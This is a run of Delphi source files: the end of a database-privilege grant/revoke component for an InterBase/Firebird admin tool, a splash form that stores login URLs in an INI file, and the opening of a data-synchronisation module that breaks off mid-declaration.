SHRegisterImage(TibSHDDLGrantorFormAction.ClassName, 'Form_Privileges.bmp'); SHRegisterImage(TibSHDDLGrantorToolbarAction_Run.ClassName, 'Button_Run.bmp'); SHRegisterImage(TibSHDDLGrantorToolbarAction_Pause.ClassName, 'Button_Stop.bmp'); SHRegisterImage(TibSHDDLGrantorToolbarAction_Refresh.ClassName, 'Button_Refresh.bmp'); SHRegisterImage(SCallPrivileges, 'Form_Privileges.bmp'); SHRegisterComponents([ TibSHDDLGrantor, TibSHDDLGrantorFactory, TibSHGrant, TibSHGrantWGO]); SHRegisterActions([ // Palette TibSHDDLGrantorPaletteAction, // Forms TibSHDDLGrantorFormAction, // Toolbar TibSHDDLGrantorToolbarAction_Run, // TibSHDDLGrantorToolbarAction_Pause, TibSHDDLGrantorToolbarAction_Refresh]); SHRegisterPropertyEditor(IibSHDDLGrantor, SCallPrivilegesFor, TibSHDDLGrantorPrivilegesForPropEditor); SHRegisterPropertyEditor(IibSHDDLGrantor, SCallGrantsOn, TibSHDDLGrantorGrantsOnPropEditor); SHRegisterPropertyEditor(IibSHDDLGrantor, SCallDisplayGrants, TibSHDDLGrantorDisplayPropEditor); end; { TibSHDDLGrantor } constructor TibSHDDLGrantor.Create(AOwner: TComponent); var vComponentClass: TSHComponentClass; begin inherited Create(AOwner); FPrivilegesFor := Format('%s', [PrivilegeTypes[4]]); FGrantsOn := Format('%s', [GrantTypes[0]]); FDisplay := Format('%s', [DisplayGrants[0]]); FUnionUsers := TStringList.Create; FAbsentUsers := TStringList.Create; FSelectG := TStringList.Create; FUpdateG := TStringList.Create; FDeleteG := TStringList.Create; FInsertG := TStringList.Create; FReferenceG := TStringList.Create; FExecuteG := TStringList.Create; FSelectGO := TStringList.Create; FUpdateGO := TStringList.Create; FDeleteGO := TStringList.Create; FInsertGO := TStringList.Create; FReferenceGO := TStringList.Create; FExecuteGO := TStringList.Create; vComponentClass := Designer.GetComponent(IibSHDatabase); if Assigned(vComponentClass) then begin FIntDatabase := vComponentClass.Create(Self); Supports(FIntDatabase, IibSHDatabase, FIntDatabaseIntf); end; end; destructor TibSHDDLGrantor.Destroy; begin FUnionUsers.Free; FAbsentUsers.Free; FSelectG.Free; FUpdateG.Free; FDeleteG.Free; FInsertG.Free; FReferenceG.Free; FExecuteG.Free; FSelectGO.Free; FUpdateGO.Free; FDeleteGO.Free; FInsertGO.Free; FReferenceGO.Free; FExecuteGO.Free; FIntDatabaseIntf := nil; FreeAndNil(FIntDatabase); inherited Destroy; end; function TibSHDDLGrantor.GetPrivilegesFor: string; begin Result := FPrivilegesFor; end; procedure TibSHDDLGrantor.SetPrivilegesFor(Value: string); var vForm: IibSHDDLGrantorForm; begin if FPrivilegesFor <> Value then begin FPrivilegesFor := Value; if GetComponentFormIntf(IibSHDDLGrantorForm, vForm) then vForm.RefreshPrivilegesForTree; end; end; function TibSHDDLGrantor.GetGrantsOn: string; begin Result := FGrantsOn; end; procedure TibSHDDLGrantor.SetGrantsOn(Value: string); var vForm: IibSHDDLGrantorForm; begin if FGrantsOn <> Value then begin FGrantsOn := Value; if GetComponentFormIntf(IibSHDDLGrantorForm, vForm) then vForm.RefreshGrantsOnTree; if (FGrantsOn = GrantTypes[0]) or (FGrantsOn = GrantTypes[1]) then begin MakePropertyVisible('SystemTables'); MakePropertyVisible('TableFields'); end else begin MakePropertyInvisible('SystemTables'); MakePropertyInvisible('TableFields'); end; Designer.UpdateObjectInspector; end; end; function TibSHDDLGrantor.GetDisplay: string; begin Result := FDisplay; end; procedure TibSHDDLGrantor.SetDisplay(Value: string); var vForm: IibSHDDLGrantorForm; begin if FDisplay <> Value then begin FDisplay := Value; if GetComponentFormIntf(IibSHDDLGrantorForm, vForm) then vForm.RefreshGrantsOnTree; end; end; function TibSHDDLGrantor.GetShowSystemTables: Boolean; begin Result := FShowSystemTables; end; procedure TibSHDDLGrantor.SetShowSystemTables(Value: Boolean); var vForm: IibSHDDLGrantorForm; begin if FShowSystemTables <> Value then begin FShowSystemTables := Value; if (GrantsOn = GrantTypes[0]) or (GrantsOn = GrantTypes[1]) then if GetComponentFormIntf(IibSHDDLGrantorForm, vForm) then vForm.RefreshGrantsOnTree; end; end; function TibSHDDLGrantor.GetIncludeFields: Boolean; begin Result := FIncludeFields; end; procedure TibSHDDLGrantor.SetIncludeFields(Value: Boolean); var vForm: IibSHDDLGrantorForm; begin if FIncludeFields <> Value then begin FIncludeFields := Value; if (GrantsOn = GrantTypes[0]) or (GrantsOn = GrantTypes[1]) or (GrantsOn = GrantTypes[2]) then if GetComponentFormIntf(IibSHDDLGrantorForm, vForm) then vForm.RefreshGrantsOnTree; end; end; procedure TibSHDDLGrantor.ClearLists; begin FSelectG.Clear; FUpdateG.Clear; FDeleteG.Clear; FInsertG.Clear; FReferenceG.Clear; FExecuteG.Clear; FSelectGO.Clear; FUpdateGO.Clear; FDeleteGO.Clear; FInsertGO.Clear; FReferenceGO.Clear; FExecuteGO.Clear; TStringList(FSelectG).Sorted := False; TStringList(FUpdateG).Sorted := False; TStringList(FDeleteG).Sorted := False; TStringList(FInsertG).Sorted := False; TStringList(FReferenceG).Sorted := False; TStringList(FExecuteG).Sorted := False; TStringList(FSelectGO).Sorted := False; TStringList(FUpdateGO).Sorted := False; TStringList(FDeleteGO).Sorted := False; TStringList(FInsertGO).Sorted := False; TStringList(FReferenceGO).Sorted := False; TStringList(FExecuteGO).Sorted := False; end; procedure TibSHDDLGrantor.SortLists; begin TStringList(FSelectG).Sort; TStringList(FUpdateG).Sort; TStringList(FDeleteG).Sort; TStringList(FInsertG).Sort; TStringList(FReferenceG).Sort; TStringList(FExecuteG).Sort; TStringList(FSelectGO).Sort; TStringList(FUpdateGO).Sort; TStringList(FDeleteGO).Sort; TStringList(FInsertGO).Sort; TStringList(FReferenceGO).Sort; TStringList(FExecuteGO).Sort; end; function TibSHDDLGrantor.GetUnionUsers: TStrings; var I: Integer; DoSecurityConnect: Boolean; begin DoSecurityConnect := False; if FUnionUsers.Count = 0 then begin if Assigned(BTCLDatabase) then begin if Assigned(FIntDatabaseIntf) then begin FIntDatabaseIntf.OwnerIID := BTCLDatabase.OwnerIID; FIntDatabaseIntf.Database := BTCLDatabase.BTCLServer.SecurityDatabase; FIntDatabaseIntf.StillConnect := True; end; if BTCLDatabase.BTCLServer.PrepareDRVService and BTCLDatabase.BTCLServer.DRVService.Attach(stSecurityService) then begin try try BTCLDatabase.BTCLServer.DRVService.DisplayUsers; except DoSecurityConnect := True; end; for I := 0 to Pred(BTCLDatabase.BTCLServer.DRVService.UserCount) do FUnionUsers.Add(BTCLDatabase.BTCLServer.DRVService.GetUserName(I)); finally BTCLDatabase.BTCLServer.DRVService.Detach; end; end else DoSecurityConnect := True; if DoSecurityConnect then begin try if FIntDatabaseIntf.Connect then if FIntDatabaseIntf.DRVQuery.ExecSQL(FormatSQL(SQL_GET_USERS_FROM_SECURITY), [], False) then while not FIntDatabaseIntf.DRVQuery.Eof do begin FUnionUsers.Add(FIntDatabaseIntf.DRVQuery.GetFieldStrValue('USER_NAME')); FIntDatabaseIntf.DRVQuery.Next; end; finally FIntDatabaseIntf.DRVQuery.Transaction.Commit; FIntDatabaseIntf.Disconnect; end; end; if BTCLDatabase.DRVQuery.ExecSQL(FormatSQL(SQL_GET_USERS_FROM_PRIVILEGES), [], False) then begin while not BTCLDatabase.DRVQuery.Eof do begin if FUnionUsers.IndexOf(BTCLDatabase.DRVQuery.GetFieldStrValue('USER_NAME')) = - 1 then begin if FUnionUsers.IndexOf(BTCLDatabase.DRVQuery.GetFieldStrValue('USER_NAME')) = -1 then begin FUnionUsers.Add(BTCLDatabase.DRVQuery.GetFieldStrValue('USER_NAME')); if BTCLDatabase.DRVQuery.GetFieldStrValue('USER_NAME') <> 'PUBLIC' then FAbsentUsers.Add(BTCLDatabase.DRVQuery.GetFieldStrValue('USER_NAME')); end; end; BTCLDatabase.DRVQuery.Next; end; end; BTCLDatabase.DRVQuery.Transaction.Commit; end; end; TStringList(FUnionUsers).Sort; TStringList(FAbsentUsers).Sort; Result := FUnionUsers; end; function TibSHDDLGrantor.GetAbsentUsers: TStrings; begin Result := FAbsentUsers; end; procedure TibSHDDLGrantor.ExtractGrants(const AClassIID: TGUID; const ACaption: string); var SQL: string; begin SQL := EmptyStr; ClearLists; if IsEqualGUID(AClassIID, IibSHView) then SQL := FormatSQL(SQL_GET_GRANTS_ON_FOR_VIEW); if IsEqualGUID(AClassIID, IibSHProcedure) then SQL := FormatSQL(SQL_GET_GRANTS_ON_FOR_PROCEDURE); if IsEqualGUID(AClassIID, IibSHTrigger) then SQL := FormatSQL(SQL_GET_GRANTS_ON_FOR_TRIGGER); if IsEqualGUID(AClassIID, IibSHRole) then SQL := FormatSQL(SQL_GET_GRANTS_ON_FOR_ROLE); if IsEqualGUID(AClassIID, IibSHUser) then SQL := FormatSQL(SQL_GET_GRANTS_ON_FOR_USER); if not Assigned(BTCLDatabase) or (Length(ACaption) = 0) or (Length(SQL) = 0) then Exit; if BTCLDatabase.DRVQuery.ExecSQL(SQL, [ACaption], False) then begin while not BTCLDatabase.DRVQuery.Eof do begin if BTCLDatabase.DRVQuery.GetFieldIntValue('GRANT_OPTION') <> 1 then begin if BTCLDatabase.DRVQuery.GetFieldStrValue('PRIVILEGE') = 'S' then FSelectG.Add(BTCLDatabase.DRVQuery.GetFieldStrValue('OBJECT_NAME')); if BTCLDatabase.DRVQuery.GetFieldStrValue('PRIVILEGE') = 'U' then if Length(BTCLDatabase.DRVQuery.GetFieldStrValue('FIELD_NAME')) > 0 then FUpdateG.Add(Format('%s.%s', [BTCLDatabase.DRVQuery.GetFieldStrValue('OBJECT_NAME'), BTCLDatabase.DRVQuery.GetFieldStrValue('FIELD_NAME')])) else FUpdateG.Add(BTCLDatabase.DRVQuery.GetFieldStrValue('OBJECT_NAME')); if BTCLDatabase.DRVQuery.GetFieldStrValue('PRIVILEGE') = 'D' then FDeleteG.Add(BTCLDatabase.DRVQuery.GetFieldStrValue('OBJECT_NAME')); if BTCLDatabase.DRVQuery.GetFieldStrValue('PRIVILEGE') = 'I' then FInsertG.Add(BTCLDatabase.DRVQuery.GetFieldStrValue('OBJECT_NAME')); if BTCLDatabase.DRVQuery.GetFieldStrValue('PRIVILEGE') = 'R' then if Length(BTCLDatabase.DRVQuery.GetFieldStrValue('FIELD_NAME')) > 0 then FReferenceG.Add(Format('%s.%s', [BTCLDatabase.DRVQuery.GetFieldStrValue('OBJECT_NAME'), BTCLDatabase.DRVQuery.GetFieldStrValue('FIELD_NAME')])) else FReferenceG.Add(BTCLDatabase.DRVQuery.GetFieldStrValue('OBJECT_NAME')); if BTCLDatabase.DRVQuery.GetFieldStrValue('PRIVILEGE') = 'X' then FExecuteG.Add(BTCLDatabase.DRVQuery.GetFieldStrValue('OBJECT_NAME')); end else begin if BTCLDatabase.DRVQuery.GetFieldStrValue('PRIVILEGE') = 'S' then FSelectGO.Add(BTCLDatabase.DRVQuery.GetFieldStrValue('OBJECT_NAME')); if BTCLDatabase.DRVQuery.GetFieldStrValue('PRIVILEGE') = 'U' then if Length(BTCLDatabase.DRVQuery.GetFieldStrValue('FIELD_NAME')) > 0 then FUpdateGO.Add(Format('%s.%s', [BTCLDatabase.DRVQuery.GetFieldStrValue('OBJECT_NAME'), BTCLDatabase.DRVQuery.GetFieldStrValue('FIELD_NAME')])) else FUpdateGO.Add(BTCLDatabase.DRVQuery.GetFieldStrValue('OBJECT_NAME')); if BTCLDatabase.DRVQuery.GetFieldStrValue('PRIVILEGE') = 'D' then FDeleteGO.Add(BTCLDatabase.DRVQuery.GetFieldStrValue('OBJECT_NAME')); if BTCLDatabase.DRVQuery.GetFieldStrValue('PRIVILEGE') = 'I' then FInsertGO.Add(BTCLDatabase.DRVQuery.GetFieldStrValue('OBJECT_NAME')); if BTCLDatabase.DRVQuery.GetFieldStrValue('PRIVILEGE') = 'R' then if Length(BTCLDatabase.DRVQuery.GetFieldStrValue('FIELD_NAME')) > 0 then FReferenceGO.Add(Format('%s.%s', [BTCLDatabase.DRVQuery.GetFieldStrValue('OBJECT_NAME'), BTCLDatabase.DRVQuery.GetFieldStrValue('FIELD_NAME')])) else FReferenceGO.Add(BTCLDatabase.DRVQuery.GetFieldStrValue('OBJECT_NAME')); if BTCLDatabase.DRVQuery.GetFieldStrValue('PRIVILEGE') = 'X' then FExecuteGO.Add(BTCLDatabase.DRVQuery.GetFieldStrValue('OBJECT_NAME')); end; BTCLDatabase.DRVQuery.Next; end; end; BTCLDatabase.DRVQuery.Transaction.Commit; SortLists; end; function TibSHDDLGrantor.GetGrantSelectIndex(const ACaption: string): Integer; begin Result := -1; if FSelectG.IndexOf(ACaption) <> -1 then Result := 0 else if FSelectGO.IndexOf(ACaption) <> -1 then Result := 1; end; function TibSHDDLGrantor.GetGrantUpdateIndex(const ACaption: string): Integer; begin Result := -1; if FUpdateG.IndexOf(ACaption) <> -1 then Result := 0 else if FUpdateGO.IndexOf(ACaption) <> -1 then Result := 1; end; function TibSHDDLGrantor.GetGrantDeleteIndex(const ACaption: string): Integer; begin Result := -1; if FDeleteG.IndexOf(ACaption) <> -1 then Result := 0 else if FDeleteGO.IndexOf(ACaption) <> -1 then Result := 1; end; function TibSHDDLGrantor.GetGrantInsertIndex(const ACaption: string): Integer; begin Result := -1; if FInsertG.IndexOf(ACaption) <> -1 then Result := 0 else if FInsertGO.IndexOf(ACaption) <> -1 then Result := 1; end; function TibSHDDLGrantor.GetGrantReferenceIndex(const ACaption: string): Integer; begin Result := -1; if FReferenceG.IndexOf(ACaption) <> -1 then Result := 0 else if FReferenceGO.IndexOf(ACaption) <> -1 then Result := 1; end; function TibSHDDLGrantor.GetGrantExecuteIndex(const ACaption: string): Integer; begin Result := -1; if FExecuteG.IndexOf(ACaption) <> -1 then Result := 0 else if FExecuteGO.IndexOf(ACaption) <> -1 then Result := 1; Result := Result; end; function TibSHDDLGrantor.IsGranted(const ACaption: string): Boolean; begin Result := (GetGrantSelectIndex(ACaption) <> -1) or (GetGrantUpdateIndex(ACaption) <> -1) or (GetGrantDeleteIndex(ACaption) <> -1) or (GetGrantInsertIndex(ACaption) <> -1) or (GetGrantReferenceIndex(ACaption) <> -1) or (GetGrantExecuteIndex(ACaption) <> -1); end; function TibSHDDLGrantor.GetNormalizeName(const ACaption: string): string; var vCodeNormalizer: IibSHCodeNormalizer; begin Result := ACaption; if Supports(Designer.GetDemon(IibSHCodeNormalizer), IibSHCodeNormalizer, vCodeNormalizer) then Result := vCodeNormalizer.MetadataNameToSourceDDL(BTCLDatabase, Result); end; function TibSHDDLGrantor.GetPrivilegesForName(const AClassIID: TGUID; const ACaption: string): string; begin if IsEqualGUID(AClassIID, IibSHView) then Result := Format('VIEW %s', [GetNormalizeName(ACaption)]); if IsEqualGUID(AClassIID, IibSHProcedure) then Result := Format('PROCEDURE %s', [GetNormalizeName(ACaption)]); if IsEqualGUID(AClassIID, IibSHTrigger) then Result := Format('TRIGGER %s', [GetNormalizeName(ACaption)]); if IsEqualGUID(AClassIID, IibSHRole) then Result := Format('%s', [GetNormalizeName(ACaption)]); if IsEqualGUID(AClassIID, IibSHUser) then begin if AnsiSameText(ACaption, 'PUBLIC') then Result := Format('PUBLIC', []) else Result := Format('USER %s', [GetNormalizeName(ACaption)]); end; end; function TibSHDDLGrantor.GrantTable(const AClassIID: TGUID; const Privilege, OnObject, ToObject: string; WGO: Boolean): Boolean; var S1, S2, SQL: string; I: Integer; begin S1 := GetNormalizeName(OnObject); S2 := GetPrivilegesForName(AClassIID, ToObject); if not WGO then SQL := FormatSQL(SQL_GRANT_TABLE) else SQL := FormatSQL(SQL_GRANT_TABLE_WGO); try BTCLDatabase.DRVQuery.Transaction.Params.Text := TRWriteParams; Result := BTCLDatabase.DRVQuery.ExecSQL(Format(SQL, [Privilege, S1, S2]), [], True); if Result then begin if not WGO then begin if AnsiUpperCase(Privilege) = 'SELECT' then begin I := FSelectG.IndexOf(OnObject); if I = -1 then FSelectG.Add(OnObject); end; if AnsiUpperCase(Privilege) = 'UPDATE' then begin I := FUpdateG.IndexOf(OnObject); if I = -1 then FUpdateG.Add(OnObject); end; if AnsiUpperCase(Privilege) = 'DELETE' then begin I := FDeleteG.IndexOf(OnObject); if I = -1 then FDeleteG.Add(OnObject); end; if AnsiUpperCase(Privilege) = 'INSERT' then begin I := FInsertG.IndexOf(OnObject); if I = -1 then FInsertG.Add(OnObject); end; if AnsiUpperCase(Privilege) = 'REFERENCES' then begin I := FReferenceG.IndexOf(OnObject); if I = -1 then FReferenceG.Add(OnObject); end; end else begin if AnsiUpperCase(Privilege) = 'SELECT' then begin I := FSelectGO.IndexOf(OnObject); if I = -1 then FSelectGO.Add(OnObject); end; if AnsiUpperCase(Privilege) = 'UPDATE' then begin I := FUpdateGO.IndexOf(OnObject); if I = -1 then FUpdateGO.Add(OnObject); end; if AnsiUpperCase(Privilege) = 'DELETE' then begin I := FDeleteGO.IndexOf(OnObject); if I = -1 then FDeleteGO.Add(OnObject); end; if AnsiUpperCase(Privilege) = 'INSERT' then begin I := FInsertGO.IndexOf(OnObject); if I = -1 then FInsertGO.Add(OnObject); end; if AnsiUpperCase(Privilege) = 'REFERENCES' then begin I := FReferenceGO.IndexOf(OnObject); if I = -1 then FReferenceGO.Add(OnObject); end; end; end; finally BTCLDatabase.DRVQuery.Transaction.Params.Text := TRReadParams; end; end; function TibSHDDLGrantor.GrantTableField(const AClassIID: TGUID; const Privilege, OnField, OnObject, ToObject: string; WGO: Boolean): Boolean; var S0, S1, S2, SQL: string; I: Integer; begin S0 := GetNormalizeName(OnField); S1 := GetNormalizeName(OnObject); S2 := GetPrivilegesForName(AClassIID, ToObject); if not WGO then SQL := FormatSQL(SQL_GRANT_TABLE_FIELD) else SQL := FormatSQL(SQL_GRANT_TABLE_FIELD_WGO); try BTCLDatabase.DRVQuery.Transaction.Params.Text := TRWriteParams; Result := BTCLDatabase.DRVQuery.ExecSQL(Format(SQL, [Privilege, S0, S1, S2]), [], True); if Result then begin if not WGO then begin if AnsiUpperCase(Privilege) = 'UPDATE' then begin I := FUpdateG.IndexOf(Format('%s.%s', [OnObject, OnField])); if I = -1 then FUpdateG.Add(Format('%s.%s', [OnObject, OnField])); end; if AnsiUpperCase(Privilege) = 'REFERENCES' then begin I := FReferenceG.IndexOf(Format('%s.%s', [OnObject, OnField])); if I = -1 then FReferenceG.Add(Format('%s.%s', [OnObject, OnField])); end; end else begin if AnsiUpperCase(Privilege) = 'UPDATE' then begin I := FUpdateGO.IndexOf(Format('%s.%s', [OnObject, OnField])); if I = -1 then FUpdateGO.Add(Format('%s.%s', [OnObject, OnField])); end; if AnsiUpperCase(Privilege) = 'REFERENCES' then begin I := FReferenceGO.IndexOf(Format('%s.%s', [OnObject, OnField])); if I = -1 then FReferenceGO.Add(Format('%s.%s', [OnObject, OnField])); end; end; end; finally BTCLDatabase.DRVQuery.Transaction.Params.Text := TRReadParams; end; end; function TibSHDDLGrantor.GrantProcedure(const AClassIID: TGUID; const OnObject, ToObject: string; WGO: Boolean): Boolean; var S1, S2, SQL: string; I: Integer; begin S1 := GetNormalizeName(OnObject); S2 := GetPrivilegesForName(AClassIID, ToObject); if not WGO then SQL := FormatSQL(SQL_GRANT_PROCEDURE) else SQL := FormatSQL(SQL_GRANT_PROCEDURE_WGO); try BTCLDatabase.DRVQuery.Transaction.Params.Text := TRWriteParams; Result := BTCLDatabase.DRVQuery.ExecSQL(Format(SQL, [S1, S2]), [], True); if Result then begin if not WGO then begin I := FExecuteG.IndexOf(OnObject); if I = -1 then FExecuteG.Add(OnObject); end else begin I := FExecuteGO.IndexOf(OnObject); if I = -1 then FExecuteGO.Add(OnObject); end; end; finally BTCLDatabase.DRVQuery.Transaction.Params.Text := TRReadParams; end; end; function TibSHDDLGrantor.RevokeTable(const AClassIID: TGUID; const Privilege, OnObject, FromObject: string; WGO: Boolean): Boolean; var S1, S2, SQL: string; I: Integer; begin S1 := GetNormalizeName(OnObject); S2 := GetPrivilegesForName(AClassIID, FromObject); if not WGO then SQL := FormatSQL(SQL_REVOKE_TABLE) else SQL := FormatSQL(SQL_REVOKE_TABLE_WGO); try BTCLDatabase.DRVQuery.Transaction.Params.Text := TRWriteParams; Result := BTCLDatabase.DRVQuery.ExecSQL(Format(SQL, [Privilege, S1, S2]), [], True); if Result then begin if AnsiUpperCase(Privilege) = 'SELECT' then begin I := FSelectG.IndexOf(OnObject); if I <> -1 then FSelectG.Delete(I); I := FSelectGO.IndexOf(OnObject); if I <> -1 then FSelectGO.Delete(I); end; if AnsiUpperCase(Privilege) = 'UPDATE' then begin I := FUpdateG.IndexOf(OnObject); if I <> -1 then FUpdateG.Delete(I); I := FUpdateGO.IndexOf(OnObject); if I <> -1 then FUpdateGO.Delete(I); end; if AnsiUpperCase(Privilege) = 'DELETE' then begin I := FDeleteG.IndexOf(OnObject); if I <> -1 then FDeleteG.Delete(I); I := FDeleteGO.IndexOf(OnObject); if I <> -1 then FDeleteGO.Delete(I); end; if AnsiUpperCase(Privilege) = 'INSERT' then begin I := FInsertG.IndexOf(OnObject); if I <> -1 then FInsertG.Delete(I); I := FInsertGO.IndexOf(OnObject); if I <> -1 then FInsertGO.Delete(I); end; if AnsiUpperCase(Privilege) = 'REFERENCES' then begin I := FReferenceG.IndexOf(OnObject); if I <> -1 then FReferenceG.Delete(I); I := FReferenceGO.IndexOf(OnObject); if I <> -1 then FReferenceGO.Delete(I); end; if WGO then begin if AnsiUpperCase(Privilege) = 'SELECT' then begin I := FSelectG.IndexOf(OnObject); if I = -1 then FSelectG.Add(OnObject); end; if AnsiUpperCase(Privilege) = 'UPDATE' then begin I := FUpdateG.IndexOf(OnObject); if I = -1 then FUpdateG.Add(OnObject); end; if AnsiUpperCase(Privilege) = 'DELETE' then begin I := FDeleteG.IndexOf(OnObject); if I = -1 then FDeleteG.Add(OnObject); end; if AnsiUpperCase(Privilege) = 'INSERT' then begin I := FInsertG.IndexOf(OnObject); if I = -1 then FInsertG.Add(OnObject); end; if AnsiUpperCase(Privilege) = 'REFERENCES' then begin I := FReferenceG.IndexOf(OnObject); if I = -1 then FReferenceG.Add(OnObject); end; end; end; finally BTCLDatabase.DRVQuery.Transaction.Params.Text := TRReadParams; end; end; function TibSHDDLGrantor.RevokeTableField(const AClassIID: TGUID; const Privilege, OnField, OnObject, FromObject: string; WGO: Boolean): Boolean; var S0, S1, S2, SQL: string; I: Integer; begin S0 := GetNormalizeName(OnField); S1 := GetNormalizeName(OnObject); S2 := GetPrivilegesForName(AClassIID, FromObject); if not WGO then SQL := FormatSQL(SQL_REVOKE_TABLE_FIELD) else SQL := FormatSQL(SQL_REVOKE_TABLE_FIELD_WGO); try BTCLDatabase.DRVQuery.Transaction.Params.Text := TRWriteParams; Result := BTCLDatabase.DRVQuery.ExecSQL(Format(SQL, [Privilege, S0, S1, S2]), [], True); if Result then begin if AnsiUpperCase(Privilege) = 'UPDATE' then begin I := FUpdateG.IndexOf(Format('%s.%s', [OnObject, OnField])); if I <> -1 then FUpdateG.Delete(I); I := FUpdateGO.IndexOf(Format('%s.%s', [OnObject, OnField])); if I <> -1 then FUpdateGO.Delete(I); end; if AnsiUpperCase(Privilege) = 'REFERENCES' then begin I := FReferenceG.IndexOf(Format('%s.%s', [OnObject, OnField])); if I <> -1 then FReferenceG.Delete(I); I := FReferenceGO.IndexOf(Format('%s.%s', [OnObject, OnField])); if I <> -1 then FReferenceGO.Delete(I); end; if WGO then begin if AnsiUpperCase(Privilege) = 'UPDATE' then begin I := FUpdateG.IndexOf(Format('%s.%s', [OnObject, OnField])); if I = -1 then FUpdateG.Add(Format('%s.%s', [OnObject, OnField])); end; if AnsiUpperCase(Privilege) = 'REFERENCES' then begin I := FReferenceG.IndexOf(Format('%s.%s', [OnObject, OnField])); if I = -1 then FReferenceG.Add(Format('%s.%s', [OnObject, OnField])); end; end; end; finally BTCLDatabase.DRVQuery.Transaction.Params.Text := TRReadParams; end; end; function TibSHDDLGrantor.RevokeProcedure(const AClassIID: TGUID; const OnObject, FromObject: string; WGO: Boolean): Boolean; var S1, S2, SQL: string; I: Integer; begin S1 := GetNormalizeName(OnObject); S2 := GetPrivilegesForName(AClassIID, FromObject); if not WGO then SQL := FormatSQL(SQL_REVOKE_PROCEDURE) else SQL := FormatSQL(SQL_REVOKE_PROCEDURE_WGO); try BTCLDatabase.DRVQuery.Transaction.Params.Text := TRWriteParams; Result := BTCLDatabase.DRVQuery.ExecSQL(Format(SQL, [S1, S2]), [], True); if Result then begin I := FExecuteG.IndexOf(OnObject); if I <> -1 then FExecuteG.Delete(I); I := FExecuteGO.IndexOf(OnObject); if I <> -1 then FExecuteGO.Delete(I); if WGO then begin I := FExecuteG.IndexOf(OnObject); if I = -1 then FExecuteG.Add(OnObject); end; end; finally BTCLDatabase.DRVQuery.Transaction.Params.Text := TRReadParams; end; end; initialization Register; end.
unit SplashFrm; interface uses Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, StdCtrls, ExtCtrls, IniFiles; type TSplashForm = class(TForm) Img_Splash: TImage; Setting_Page: TGroupBox; Label1: TLabel; Edt_Page_Login: TEdit; Label2: TLabel; Edt_Page_Portal: TEdit; Label_About: TLabel; procedure FormCreate(Sender: TObject); procedure FormCloseQuery(Sender: TObject; var CanClose: Boolean); procedure Img_SplashClick(Sender: TObject); private { Private declarations } public { Public declarations } end; var SplashForm: TSplashForm; Monolith_ini:TiniFile; implementation uses MainFrm; {$R *.dfm} procedure TSplashForm.FormCreate(Sender: TObject); begin //初始化设置 Setting_Page.Hide; Monolith_ini:=TIniFile.Create(ExtractFilePath(Application.ExeName)+'Monolith_ini.ini'); Try Edt_Page_Login.Text := Monolith_ini.ReadString('浏览器参数设置', 'Page_Login', 'http://zerolone/manage/login.asp'); Edt_Page_Portal.Text := Monolith_ini.ReadString('浏览器参数设置', 'Page_Portal', 'http://zerolone/'); Except ShowMessage('未找到'+ExtractFilePath(Application.ExeName)+'Monolith_ini.ini文件,系统使用默认设置。'); End; end; procedure TSplashForm.FormCloseQuery(Sender: TObject; var CanClose: Boolean); begin CanClose:=False; Monolith_ini.WriteString('浏览器参数设置', 'Page_Login', Edt_Page_Login.Text); Monolith_ini.WriteString('浏览器参数设置', 'Page_Portal', Edt_Page_Portal.Text); MainForm.Visible := True; CanClose:=True; end; procedure TSplashForm.Img_SplashClick(Sender: TObject); begin SplashForm.Close; end; end.
unit DIntegradorModuloWeb; interface uses SysUtils, ExtCtrls, DBClient, idHTTP, MSXML2_TLB, dialogs, acStrUtils, acNetUtils, DB, IdMultipartFormData, IdBaseComponent, IdComponent, IdTCPConnection, forms, IdTCPClient, IdCoder, IdCoder3to4, IdCoderUUE, IdCoderXXE, Controls, IDataPrincipalUnit, idURI, System.Classes, Windows, ISincronizacaoNotifierUnit, Data.SqlExpr, Xml.XMLIntf, Winapi.ActiveX, XML.XMLDoc; type EIntegradorException = class(Exception) end; TDMLOperation = (dmInsert, dmUpdate); THttpAction = (haGet, haPost); TParamsType = (ptParam, ptJSON); TNameTranslation = record server: string; pdv: string; lookupRemoteTable: string; fkName: string; end; TTranslationSet = class protected translations: array of TNameTranslation; public constructor create(owner: TComponent); procedure add(serverName, pdvName: string; lookupRemoteTable: string = ''; fkName: string = ''); function translateServerToPDV(serverName: string; duasVias: boolean): string; function translatePDVToServer(pdvName: string): string; function size: integer; function get(index: integer): TNameTranslation; procedure clear; end; TTabelaDependente = record nomeTabela: string; nomeFK: string; end; TTabelaDetalhe = class public nomeTabela: string; nomeFK: string; nomePK: string; nomeParametro: string; nomeSingularDetalhe : string; nomePluralDetalhe : string; tabelasDetalhe: array of TTabelaDetalhe; translations: TTranslationSet; constructor create; end; TDataIntegradorModuloWeb = class(TDataModule) procedure DataModuleCreate(Sender: TObject); private FdmPrincipal: IDataPrincipal; Fnotifier: ISincronizacaoNotifier; FthreadControl: IThreadControl; FCustomParams: ICustomParams; FstopOnPostRecordError: boolean; procedure SetdmPrincipal(const Value: IDataPrincipal); function getdmPrincipal: IDataPrincipal; procedure addTabelaDetalheParams(valorPK: integer; params: TStringList; tabelaDetalhe: TTabelaDetalhe); function GetErrorMessage(const aXML: string): string; procedure SetDataLog(const Value: ILog); procedure UpdateRecordDetalhe(pNode: IXMLDomNode; pTabelasDetalhe : array of TTabelaDetalhe); procedure SetthreadControl(const Value: IThreadControl); procedure OnWorkHandler(ASender: TObject; AWorkMode: TWorkMode; AWorkCount: Int64); protected FDataLog: ILog; nomeTabela: string; nomeSingular: string; nomePlural: string; nomePKLocal: string; nomePKRemoto: string; nomeGenerator: string; usePKLocalMethod: Boolean; duasVias: boolean; useMultipartParams: boolean; clientToServer: boolean; tabelasDependentes: array of TTabelaDependente; tabelasDetalhe: array of TTabelaDetalhe; offset: integer; paramsType: TParamsType; function getVersionFieldName: string; virtual; procedure Log(const aLog: string; aClasse: string = ''); virtual; function extraGetUrlParams: String; virtual; procedure beforeRedirectRecord(idAntigo, idNovo: integer); virtual; function ultimaVersao: integer; virtual; function getRequestUrlForAction(toSave: boolean; versao: integer = -1): string; virtual; procedure importRecord(node: IXMLDomNode); procedure insertRecord(const aInsertStatement: string); procedure updateRecord(const aUpdateStatement: string; const id: integer); function jaExiste(id: integer): boolean; function getFieldList(node: IXMLDomNode): string; function getFieldUpdateList(node: IXMLDomNode): string; function getFieldValues(node: IXMLDomNode): string; function translateFieldValue(node: IXMLDomNode): string; virtual; function translateFieldNamePdvToServer(node: IXMLDomNode): string; function translateFieldNameServerToPdv(node: IXMLDomNode): string; virtual; function translateTypeValue(fieldType, fieldValue: string): string; function translateValueToServer(translation: TNameTranslation; fieldName: string; field: 